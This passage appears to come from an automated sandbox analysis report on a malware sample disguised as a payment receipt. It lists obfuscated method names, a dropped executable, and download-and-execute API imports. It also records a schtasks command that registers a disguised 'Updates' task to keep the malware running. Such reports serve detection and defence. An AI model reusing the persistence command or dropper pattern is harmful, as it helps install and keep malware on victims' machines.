                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, hU0Fe9zGldXS0Zr1mm.csHigh entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.csHigh entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, DlfsjvW8qU2neLHntS.csHigh entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, JiRbLSYRlBl4b0VgTN.csHigh entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, CVXAVe7nWDFxph07mH.csHigh entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, eypnOtCKX1eP4JZEaNs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, q3IMVh9eXLPFjsBI68.csHigh entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, W0GiVD07L1dakng1fT.csHigh entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, UT08udX6WOGG1Xdpo8.csHigh entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ERn86KasASr1vtjG5F.csHigh entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, QqHRLaRpJUUjNPWaM6.csHigh entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ewK3dTKT9pbHQwq4m4.csHigh entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, I4yCbBHuJi9Z8K8qlV.csHigh entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, CljGtOkAwYyBjbav2l.csHigh entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, vLjfL3CEHUOl1VQ9Tso.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, oijrmXCCIbXkLRKl9M7.csHigh entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ruWa8kfTr9ZynRX962.csHigh entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ooK3AkAQIu8efntkad.csHigh entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, lCdxmZGJ13p9rdDdZF.csHigh entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, z9OTkkLIYYXRXIYAsa.csHigh entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, hU0Fe9zGldXS0Zr1mm.csHigh entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.csHigh entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, DlfsjvW8qU2neLHntS.csHigh entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, JiRbLSYRlBl4b0VgTN.csHigh entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, CVXAVe7nWDFxph07mH.csHigh entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, eypnOtCKX1eP4JZEaNs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, q3IMVh9eXLPFjsBI68.csHigh entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, W0GiVD07L1dakng1fT.csHigh entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, UT08udX6WOGG1Xdpo8.csHigh entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ERn86KasASr1vtjG5F.csHigh entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, QqHRLaRpJUUjNPWaM6.csHigh entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ewK3dTKT9pbHQwq4m4.csHigh entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, I4yCbBHuJi9Z8K8qlV.csHigh entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, CljGtOkAwYyBjbav2l.csHigh entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, vLjfL3CEHUOl1VQ9Tso.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, oijrmXCCIbXkLRKl9M7.csHigh entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ruWa8kfTr9ZynRX962.csHigh entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile created: C:\Users\user\AppData\Roaming\eaJOpx.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
